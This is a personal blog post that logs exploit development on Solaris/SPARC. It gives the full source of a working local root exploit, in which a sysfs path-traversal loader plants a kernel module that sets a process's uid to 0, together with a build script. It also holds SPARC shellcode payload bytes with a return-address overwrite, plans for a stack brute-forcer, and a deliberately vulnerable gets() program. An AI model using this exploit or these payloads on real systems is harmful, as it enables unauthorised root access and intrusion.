Woo-Hoo. I’m finally ready to release source code :D
Woo-Hoo. I’m finally ready to release source code :D
“The Shellcoder’s Handbook” comes supplied with a ready exploit against http://www.securitytracker.com/id/1008833
But, it has some problems. the kernel module compiling script is broken (needs -c flag), else it will bitch about _init and _fini being defined twice.. This script uses the Sun Studio (11) cc compiler, but gcc can be used too (untested). https://www.thc.org/papers/slkm-1.0.html suggests
gcc -D_KERNEL -DSVR4 -DSOL2 -O2 -c flkm.c
ld -o flkm -r flkm.o
To test this exploit (which I did successfully, yes this code works as is), I had to back down my patches on my Solaris box.. There is no automatic tool to uninstall patch dependencies.. So I built my own:
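#define _POSIX_C_SOURCE 200809L   /* popen(3)/pclose(3) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

/*
 * Recursive patchrm(1M) driver.
 *
 * Runs "patchrm <id>". When patchrm refuses because a later patch depends on
 * this one ("... required to be installed by patch NNNNNN-NN"), the current
 * command is pushed on deeplist[], the dependent patch is removed first, and
 * the deferred command is retried as the stack unwinds.
 *
 * Every id that reaches the shell comes either from argv[1] or from patchrm's
 * own output; both are checked by is_patch_id() before being interpolated
 * into a command line.
 */

enum {
    PATCH_ID_MAX = 16   /* longest id accepted; "patchrm " + id + NUL must fit one deeplist row */
};

char logtime_str[8192];        /* one line of patchrm output */
char mycmd[1024];              /* command currently being run */
char deeplist[8192][25];       /* stack of deferred "patchrm <id>" commands */
int curcount = 0;              /* number of entries in deeplist */

static const char dep_marker[] = "required to be installed by patch ";
static char depid[PATCH_ID_MAX + 1];   /* id extracted by the last doit() call */

/*
 * True when s looks like a Solaris patch id: 1..PATCH_ID_MAX characters,
 * digits and '-' only (e.g. 108528-29). Rejects NULL and "".
 */
static int is_patch_id(const char *s)
{
    size_t n;

    if (s == NULL || *s == '\0')
        return 0;
    n = strspn(s, "0123456789-");
    return s[n] == '\0' && n <= PATCH_ID_MAX;
}

/*
 * Run cmd through popen(), echo its output line by line, and look for the
 * dependency message. On a hit, push cmd on deeplist[] and return the
 * dependent patch id (static storage, valid until the next call). Return NULL
 * when the output carries no dependency message, when the pipe cannot be
 * opened, or when the id is malformed / the stack is full (reported on stderr).
 * The pipe is always drained to EOF and pclose()d so the child is reaped.
 */
char *doit(char *cmd)
{
    FILE *fp = popen(cmd, "r");
    char *found = NULL;

    if (fp == NULL) {
        printf("Failed to run command\n");
        return NULL;
    }
    while (fgets(logtime_str, sizeof logtime_str, fp) != NULL) {
        char *str;
        size_t n;

        printf("%s", logtime_str);
        if (found != NULL)
            continue;                 /* already have the id; keep draining */
        str = strstr(logtime_str, dep_marker);
        if (str == NULL)
            continue;
        str += sizeof dep_marker - 1;
        /* The id runs up to the next whitespace or punctuation. */
        n = strcspn(str, " \t\r\n.,");
        if (n > PATCH_ID_MAX)
            n = PATCH_ID_MAX;
        memcpy(depid, str, n);
        depid[n] = '\0';
        if (!is_patch_id(depid)) {
            fprintf(stderr, "unexpected patch id in patchrm output: \"%s\"\n", depid);
            continue;
        }
        if (curcount >= (int)(sizeof deeplist / sizeof deeplist[0]) ||
            strlen(cmd) >= sizeof deeplist[0]) {
            fprintf(stderr, "dependency stack full, not recursing\n");
            continue;
        }
        strcpy(deeplist[curcount++], cmd);   /* length checked just above */
        found = depid;
    }
    if (pclose(fp) == -1)
        perror("pclose");
    return found;
}

/*
 * Usage: a.out NNNNNN-NN
 * Removes the given patch and, recursively, every patch that depends on it.
 * Exit status: 1 on a bad argument, 1 when a dependent patch could not be
 * removed (retrying its parent would otherwise loop forever), 0 otherwise.
 */
int main(int argc, char **argv)
{
    char lastdone[PATCH_ID_MAX + 1] = "";   /* id whose patchrm produced no dependency */

    if (argc != 2 || !is_patch_id(argv[1])) {
        fprintf(stderr, "usage: %s NNNNNN-NN\n", argv[0]);
        exit(1);
    }
    printf("Removing Patch %s\n", argv[1]);
    snprintf(mycmd, sizeof mycmd, "patchrm %s", argv[1]);
    for (;;) {
        char *newstr = doit(mycmd);

        if (newstr != NULL) {
            if (strcmp(newstr, lastdone) == 0) {
                /* We just ran "patchrm <newstr>" and patchrm still reports it
                 * as installed: that removal failed, so stop instead of
                 * bouncing between parent and child forever. */
                fprintf(stderr, "patchrm %s did not remove the patch; giving up\n", newstr);
                return 1;
            }
            snprintf(mycmd, sizeof mycmd, "patchrm %s", newstr);
            printf("%s\n", mycmd);
            printf("Removing Patch %s\n", newstr);
        } else if (curcount > 0) {
            /* No dependency reported: remember which id just ran, then retry
             * the command we deferred. mycmd always starts with "patchrm ". */
            snprintf(lastdone, sizeof lastdone, "%s", mycmd + strlen("patchrm "));
            strcpy(mycmd, deeplist[--curcount]);
            memset(deeplist[curcount], 0, sizeof deeplist[curcount]);
        } else {
            break;
        }
    }
    return 0;
}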
in my case, I needed to uninstall 108528-29, and there were a lot of nested dependencies involved, ALL having to be uninstalled manually without this tool above.. So now I just do:
./a.out 108528-29
And BAM.. auto uninstall..
WARNING: Back-pedaling thru patches is dangerous!! My SSHD doesn’t work correctly now :[ So now I’m reinstalling the patch cluster x.x
Now, the source code to the exploit… Since this source code was not found anywhere, I had to transcribe it all myself…
o0o0.c
#include <stdio.h>
#include <sys/fstyp.h>
#include <sys/fsid.h>
#include <sys/systeminfo.h>
/* int sysfs(int opcode, const char *fsname); */

/*
 * o0o0.c: userland half of the Shellcoder's Handbook Solaris example referenced
 * at the top of the page (securitytracker id 1008833).
 *
 * Flow: detect a 32- vs 64-bit kernel with sysinfo(SI_ISALIST), copy the
 * matching prebuilt module (./o032 or ./o064, see make_64.sh) to a fixed path
 * under /tmp via system(), call sysfs(GETFSIND, "../../../tmp/o0"), then
 * remove the staged file. The release string is printed but not used (the
 * format arguments that would have consumed it are commented out).
 *
 * Implicitly declared here: memset/strstr (<string.h>), exit/system
 * (<stdlib.h>), mkdir (<sys/stat.h>). Every error path calls exit(0), so a
 * failed run still reports success to the shell, and main has no return.
 * The staging path and file name are fixed strings, which is what makes this
 * run observable on disk.
 */
int main(int argc, char **argv)
{
    char modname[] = "../../../tmp/o0";   /* relative name handed to sysfs() */
    char buf[4096];
    char ver[32], *ptr;
    int sixtyfour = 0;

    /* SI_ISALIST lists the supported instruction sets; "sparcv9" present means a 64-bit kernel. */
    memset((char *) buf, 0x00, 4096);
    if (sysinfo(SI_ISALIST, (char *) buf, 4095) < 0) {
        perror("sysinfo");
        exit (0);
    }
    if (strstr(buf, "sparcv9"))
        sixtyfour = 1;

    /* Release string such as "5.8"; ptr ends up pointing just past the '.'. */
    memset( (char *) ver, 0x00, 32);
    if (sysinfo(SI_RELEASE, (char *) ver, 32) < 0) {
        perror("sysinfo");
        exit (0);
    }
    ptr = (char *) strstr(ver, ".");
    if (!ptr) {
        fprintf(stderr, "can't grab release version!\n");
        exit (0);
    }
    ptr++;
    printf ("%s\n",ptr);
    //return 0;

    /* Build the copy command; on a 64-bit kernel the file goes under /tmp/sparcv9/ instead. */
    memset((char *) buf, 0x00, 4096);
    if (sixtyfour)
        snprintf(buf, sizeof(buf)-1, "cp ./o064 /tmp/sparcv9/o0"/*, ptr*/);
    else
        snprintf(buf, sizeof(buf)-1, "cp ./o032 /tmp/o0"/*, ptr*/);
    /* mkdir fails (and the program exits) if /tmp/sparcv9 already exists. */
    if (sixtyfour) {
        if (mkdir("/tmp/sparcv9", 0755) < 0) {
            perror ("mkdir");
            exit(0);
        }
    }
    system(buf);
    /* The trigger: ask for a filesystem type index by a relative module name. */
    sysfs(GETFSIND, modname);
    /* Remove the staged file(s); the return values of system() are not checked. */
    if (sixtyfour)
        system("/usr/bin/rm -rf /tmp/sparcv9");
    else
        system("/usr/bin/rm -f /tmp/o0");
}
moka.c
#include <sys/systm.h>
#include <sys/ddi.h>
#include <sys/sunddi.h>
#include <sys/cred.h>
#include <sys/types.h>
#include <sys/proc.h>
#include <sys/procfs.h>
#include <sys/kmem.h>
#include <sys/errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/modctl.h>

/*
 * moka.c: kernel-side half of the Shellcoder's Handbook Solaris example
 * referenced at the top of the page. A misc module (mod_miscops) that, when
 * loaded, scans the process table and replaces the credentials of the parent
 * of every process whose command name contains "o0o0" with a copy whose
 * cr_uid is 0. How the module gets loaded is o0o0.c's business.
 */

extern struct mod_ops mod_miscops;

int g3mm3(void);

/*
 * Walk practive under pidlock. For each process whose u_comm contains
 * "o0o0", take the parent's p_crlock, copy the parent's cred into a fresh
 * one from crget(), install the copy as p_cred and set its cr_uid to 0.
 * Always returns 1. The parent is re-patched once per matching child.
 */
int g3mm3()
{
    register proc_t *p;
    register proc_t *pp;
    cred_t *cr, *newcr;

    mutex_enter(&pidlock);
    for (p=practive; p!=NULL; p = p->p_next) {
        if (strstr(p->p_user.u_comm, (char *) "o0o0")) {
            pp = p->p_parent;
            newcr = crget();
            mutex_enter(&pp->p_crlock);
            cr = pp->p_cred;
            crcopy_to(cr,newcr);
            pp->p_cred = newcr;
            newcr->cr_uid = 0;
            mutex_exit(&pp->p_crlock);
        }
        continue;   /* no-op: the loop increment follows anyway */
    }
    mutex_exit(&pidlock);
    return 1;
}

static struct modlmisc modlmisc = {
    &mod_miscops,
    "u_comm"   /* module description string; presumably what modinfo(1M) shows — confirm */
};

static struct modlinkage modlinkage = {
    MODREV_1,
    (void *) &modlmisc,
    NULL
};

/*
 * Module entry point: register the module, then run g3mm3().
 * Layout note: the `if` body is the lone `;` on the next line, and the `else`
 * exists only when _DEBUG is defined. The function returns g3mm3()'s value
 * (always 1), so mod_install()'s result is never reported to the loader.
 */
int _init(void)
{
    int i;
    if ((i = mod_install(&modlinkage)) != 0)
        //cmn_err(CE_NOTE, "");
        ;
#ifdef _DEBUG
    else cmn_err(CE_NOTE, "o0o0o0o0 installed o0o0o0o0");
#endif
    i = g3mm3();
    return i;
}

/* Standard modinfo hook. */
int _info(struct modinfo *modinfop)
{
    return (mod_info(&modlinkage, modinfop));
}

/* Module exit point: unregister; same #ifdef _DEBUG shape as _init, but here the mod_remove() result is returned. */
int _fini(void)
{
    int i;
    if ((i = mod_remove(&modlinkage)) != 0)
        //cmn_err (CE_NOTE, "not removed");
        ;
#ifdef _DEBUG
    else cmn_err(CE_NOTE, "removed");
#endif
    return i;
}
make_64.sh
# make_64.sh: build the sparcv9 (64-bit) module and the userland trigger.
# Steps run unconditionally (no `set -e`): a failed cc still falls through to
# rm/mv, so read the compiler output before trusting o064.

# Compile only (-c); the module is produced by `ld -r` below. Without -c the
# link complains about _init/_fini being defined twice (noted in the text above).
/opt/SUNWspro/bin/cc -xCC -g -xregs=no%appl,no%float -xarch=v9 -DUSE_KERNEL_UTILS -D_KERNEL -D_B64 -c moka.c
ld -o moka -r moka.o
rm moka.o
# o064 is the file name o0o0.c copies into /tmp on a sparcv9 kernel.
mv moka o064
gcc -o o0o0 o0o0.c
/usr/ccs/bin/strip o0o0 o064
Note: There were inconsistencies with the source code that I took care of.. Apparently the writers of the Shellcoder’s Handbook didn’t give 2 fucks about this one…
Now let’s start perfecting our exploit:
STACK RANGE 0xFFBEE000 . . 0xFFBEE800 . . 0xFFBEF000 . . 0xFFBEF800 . 0xFFBF0000
The above is the typical Stack range for a 32-bit sparc app in 64-bit kernel. That’s as specific as I care for.. We can create a guesser program to, based on nop-sled size, slice the bitspace into potential landing pads and call the vulnerable program for each landing pad until success.
Thus, this program will have the payload and be able to modify it as it goes.
given this line:
./build_shellcode_steps asmshell5_interactive.bin; ./alternating_payload3 338 >> payload; printf "\x41\x0a" >> payload
I have 338 bytes of nop slide goodness, 0x152. 8192 / 338 = 24.2 = 24. We can break the stack space into 24 chunks of potential zones where one of them will successfully execute the exploit. I’m assuming I have that many chances anyways..
Writing the automated Stack Shocker
Let me categorize our buffer:
[11111111111][fp][ra][2222222222222222222]
11111 and fp unchanged. ra is changed and 22222 is unchanged
I begin crafting my program.
-bash-4.3$ od -t x1 -A n payload 01 41 41 41 01 42 42 42 01 43 43 43 01 44 44 44 01 45 45 45 01 46 46 46 01 47 47 47 01 48 48 48 01 49 49 49 01 4a 4a 4a 01 4b 4b 4b 01 4c 4c 4c 01 4d 4d 4d 01 4e 4e 4e 01 4f 4f 4f 01 50 50 50 01 51 51 51 01 52 52 52 01 53 53 53 01 54 54 54 01 55 55 55 01 56 56 56 01 57 57 57 01 58 58 58 01 59 59 59 01 5a 5a 5a 02 41 41 41 02 42 42 42 02 43 43 43 02 44 44 44 02 45 45 45 02 46 46 46 02 47 47 47 02 48 48 48 02 49 49 49 02 4a 4a 4a 02 4b 4b 4b 02 4c 4c 4c 02 4d 4d 4d 02 4e 4e 4e 02 4f 4f 4f 02 50 50 50 02 51 51 51 02 52 52 52 02 53 53 53 02 54 54 54 02 55 55 55 02 56 56 56 02 57 57 57 02 58 58 58 02 59 59 59 02 5a 5a 5a 03 41 41 41 03 42 42 42 03 43 43 43 03 44 44 44 03 45 45 45 03 46 46 46 03 47 47 47 03 48 48 48 03 49 49 49 03 4a 4a 4a 03 4b 4b 4b 03 4c 4c 4c 03 4d 4d 4d 03 4e 4e 4e 03 4f 4f 4f 03 50 50 50 03 51 51 51 03 52 52 52 03 53 53 53 03 54 54 54 03 55 55 55 03 56 56 56 03 57 57 57 03 58 58 58 03 59 59 59 03 5a 5a 5a 04 41 41 41 04 42 42 42 04 43 43 43 04 44 44 44 ff be fe 68 ff be fe 50 11 0b d8 9a 90 12 21 6e d0 23 a0 54 11 0b dc da d0 23 a0 58 11 0b 5a 40 d0 23 a0 5c c0 23 a0 60 90 03 a0 54 d0 23 a0 48 90 03 a0 5c d0 23 a0 4c c0 23 a0 50 90 03 a0 54 92 03 a0 48 94 1b 40 0d 82 10 20 3b 91 d0 20 08 90 1b 40 0d 82 10 20 01 91 d0 20 08 0a -bash-4.3$ od -t x1 -A n payload | sed 's/ //g' 01 41 41 41 01 42 42 42 01 43 43 43 01 44 44 44 01 45 45 45 01 46 46 46 01 47 47 47 01 48 48 48 01 49 49 49 01 4a 4a 4a 01 4b 4b 4b 01 4c 4c 4c 01 4d 4d 4d 01 4e 4e 4e 01 4f 4f 4f 01 50 50 50 01 51 51 51 01 52 52 52 01 53 53 53 01 54 54 54 01 55 55 55 01 56 56 56 01 57 57 57 01 58 58 58 01 59 59 59 01 5a 5a 5a 02 41 41 41 02 42 42 42 02 43 43 43 02 44 44 44 02 45 45 45 02 46 46 46 02 47 47 47 02 48 48 48 02 49 49 49 02 4a 4a 4a 02 4b 4b 4b 02 4c 4c 4c 02 4d 4d 4d 02 4e 4e 4e 02 4f 4f 4f 02 50 50 50 02 51 51 51 02 52 52 52 02 53 53 53 02 54 54 54 02 55 55 55 02 56 56 56 02 57 57 57 02 58 58 58 02 59 59 59 02 5a 5a 5a 03 41 41 41 03 42 42 42 03 43 
43 43 03 44 44 44 03 45 45 45 03 46 46 46 03 47 47 47 03 48 48 48 03 49 49 49 03 4a 4a 4a 03 4b 4b 4b 03 4c 4c 4c 03 4d 4d 4d 03 4e 4e 4e 03 4f 4f 4f 03 50 50 50 03 51 51 51 03 52 52 52 03 53 53 53 03 54 54 54 03 55 55 55 03 56 56 56 03 57 57 57 03 58 58 58 03 59 59 59 03 5a 5a 5a 04 41 41 41 04 42 42 42 04 43 43 43 04 44 44 44 ff be fe 68 ff be fe 50 11 0b d8 9a 90 12 21 6e d0 23 a0 54 11 0b dc da d0 23 a0 58 11 0b 5a 40 d0 23 a0 5c c0 23 a0 60 90 03 a0 54 d0 23 a0 48 90 03 a0 5c d0 23 a0 4c c0 23 a0 50 90 03 a0 54 92 03 a0 48 94 1b 40 0d 82 10 20 3b 91 d0 20 08 90 1b 40 0d 82 10 20 01 91 d0 20 08 0a -bash-4.3$ od -t x1 -A n payload | sed 's/ //g' | sed 's/ /\\x/g' \x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44 \x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48 \x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c \x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50 \x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54 \x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58 \x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42 \x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46 \x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a \x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e \x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52 \x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56 \x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a \x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44 \x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48 \x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c \x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50 \x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54 \x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58 \x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42 
\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50 \x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda \xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60 \x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c \xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d \x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01 \x91\xd0\x20\x08\x0a
further continuing this:
-bash-4.3$ od -t x1 -A n payload | sed 's/ //g' | sed 's/ /\\x/g' | sed 's/^/"/g' | sed 's/$/"/g' "\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44" "\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48" "\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c" "\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50" "\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54" "\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58" "\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42" "\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46" "\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a" "\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e" "\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52" "\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56" "\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a" "\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44" "\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48" "\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c" "\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50" "\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54" "\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58" "\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42" "\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50" "\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda" "\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60" "\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c" "\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01" "\x91\xd0\x20\x08\x0a" "" -bash-4.3$ od -t x1 -A n payload | sed 's/ //g' | sed 's/ /\\x/g' | sed 's/^/"/g' | sed 's/$/"/g' | sed 's/""//' 
"\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44" "\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48" "\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c" "\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50" "\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54" "\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58" "\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42" "\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46" "\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a" "\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e" "\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52" "\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56" "\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a" "\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44" "\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48" "\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c" "\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50" "\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54" "\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58" "\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42" "\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50" "\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda" "\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60" "\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c" "\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01" "\x91\xd0\x20\x08\x0a"
There is one problem. the payload.. it doesn’t have a nopsled..
each sparc instruction is 4 bytes and must be aligned properly.. word-aligned.
that means I really have 336 bytes to work with, 336/4 = 84 nop instructions.
i need a nop instruction:
# using the previous developed od2sc above.. bazz@life[pts/6][~/latest] printf ".globl main\nmain:\nxor %%g1,%%g1,%%g0\n" > /tmp/nop.S; buildsc /tmp/nop; od2sc /tmp/nop.bin "\x80\x18\x40\x01"
Although this program doesn’t have to be made in C, I am now migrating it to C in anticipation of using it with a raw PTY in the remote exploit later on.. Actually. I just discovered that I can do the following:
bazz@life[pts/6][~/latest] (cat; cat payload cat) dfd dfd AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDD���h���P ؚ�!n�#�T ���#�X Z@�#�\�#�`��T�#�H�� �� ��#�P��T��H� dfd dfd bazz@life[pts/6][~/latest]
After interacting with cat.. I can CTRL-D (not ctrl-C), and then the other program will run.. That’s great.. maybe I can make this whole exploit in bash after all… BUT! That wouldn’t allow a raw terminal session experience in the remote shell. Things like signals or CTRL-characters would be interpreted by the local shell in a “cat” session. Thus, I’m going for the C solution. Plus I just tried using expect, holy God, catting a binary string is impossible <_< of course I only spent 5 minutes on it!
I have tools I can do this in seconds on :)
I am running out.. time to call it a night. But before I do:
TO-DO
1) in PTY:
Allocate signals:
1) Sending payload
2) Respawning target process w/ new return address in payload
Add logic:
deallocate signals when the exploit is successful and we are in the shell.
2) Write the NOP-sled adjusting logic in bash. We can Cify it later
TO BE CONTINUED
SO, back to exploiting the userland gets() function.
Vulnerable Test Prog
#include <stdio.h>

/*
 * v.c: deliberately vulnerable target used throughout this post.
 * copy() reads a line from stdin into a 256-byte stack buffer with gets(),
 * which has no bound (gets() was removed from the language in C11); the
 * payload built later in the page overruns buf into the saved %fp/%i7.
 * Build as shown below ("gcc -g v.c -o v") and keep it to a throwaway box.
 */

/* Used by main to print the stack pointer. There is no C return statement:
 * whatever the register convention leaves in the return register after the
 * inline asm is what the caller sees, which is undefined behaviour in C
 * terms. The author's comment records the same doubt about which register
 * to write. */
unsigned long get_sp( void ) {
    __asm__("or %sp,%sp,%r1"); // %r1 may have to be %i0 in some circumstances?? weirdness..
}

/* The vulnerable function: fixed-size buffer, unbounded read. */
void copy( ){
    char buf[256];
    gets(buf);
}

int main( ) {
    unsigned long ret = get_sp();
    /* %x expects unsigned int; fine for the 32-bit build used here, mismatched on LP64. */
    fprintf (stderr, "sp = 0x%x", ret);
    copy( );
    return 0;
}
$ gcc -g v.c -o v
This invoke script helps me keep the stack offset the same whether I run the program in GDB or not..
Note: it doesn’t work that well on my Sun Blade 150 but it works well at the school server…
invoke script
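#!/bin/bash
# invoke: run PROG with a minimal, fixed environment (env - ... TERM=screen
# PWD=...) so the stack layout is the same inside and outside gdb.
#   -d            run PROG under gdb
#   -t            run PROG under gdb with a dedicated tty (/tmp/gdb-debug-pty)
#   -e KEY=VALUE  add one variable to the otherwise empty environment
#   -h, -?        usage
GDB=/usr/local/gnu/bin/gdb

usage() {
    printf "usage: %s -e KEY=VALUE prog [args...]\n" "$(basename "$0")"
}

while getopts "dte:h?" opt ; do
    case "$opt" in
        h|\?)
            usage
            exit 0
            ;;
        t)
            tty=1
            gdb=1
            ;;
        d)
            gdb=1
            ;;
        e)
            env=$OPTARG
            ;;
    esac
done
shift $((OPTIND - 1))

# A missing program name used to slip through: readlink -f "" yields an empty
# $prog and exec then fails with an unhelpful message.
if [ $# -lt 1 ]; then
    usage >&2
    exit 1
fi
prog=$(readlink -f "$1") || { printf "%s: cannot resolve %s\n" "$(basename "$0")" "$1" >&2; exit 1; }
shift

# $env is deliberately left unquoted: when -e was not given it must expand to
# nothing, not to an empty argument that env(1) would try to execute.
if [ -n "$gdb" ] ; then
    if [ -n "$tty" ]; then
        # Fixed, predictable path in /tmp; acceptable on a single-user box only.
        touch /tmp/gdb-debug-pty
        exec env - $env TERM=screen PWD="$PWD" "$GDB" -tty /tmp/gdb-debug-pty --args "$prog" "$@"
    else
        exec env - $env TERM=screen PWD="$PWD" "$GDB" --args "$prog" "$@"
    fi
else
    exec env - $env TERM=screen PWD="$PWD" "$prog" "$@"
fi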
I use the invoke script with absolute paths. Here’s an example:
/home/bazz/tools/tmp/latest/invoke2 v < super_payload_lol # or i want to use gdb: /home/bazz/tools/tmp/latest/invoke2 -d v # then from in gdb: # r < super_payload
Interesting note on overflowing a buffer accepted through standard input: the 0x0a byte has the same effect as a null byte. That was not documented anywhere >_< 0x0a is \n iirc, I wonder if the \r byte (0x0d) has the same effect.. I could try it out but I’m not…
Below is my buffer overflow “marker” program source code. This is documented at https://blogs.umb.edu/michaelbazzinott001/2014/09/25/alternating-payload-automated-offset-calculation-and-identification/
with the shell code assist program, it creates a block of specified length, outputs to stdout.
you are then required to concat any arbitrary data plus the null byte (or, apparently \n)
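#include <stdio.h>
#include <stdlib.h>
// SPARC uses sys/inttypes.h
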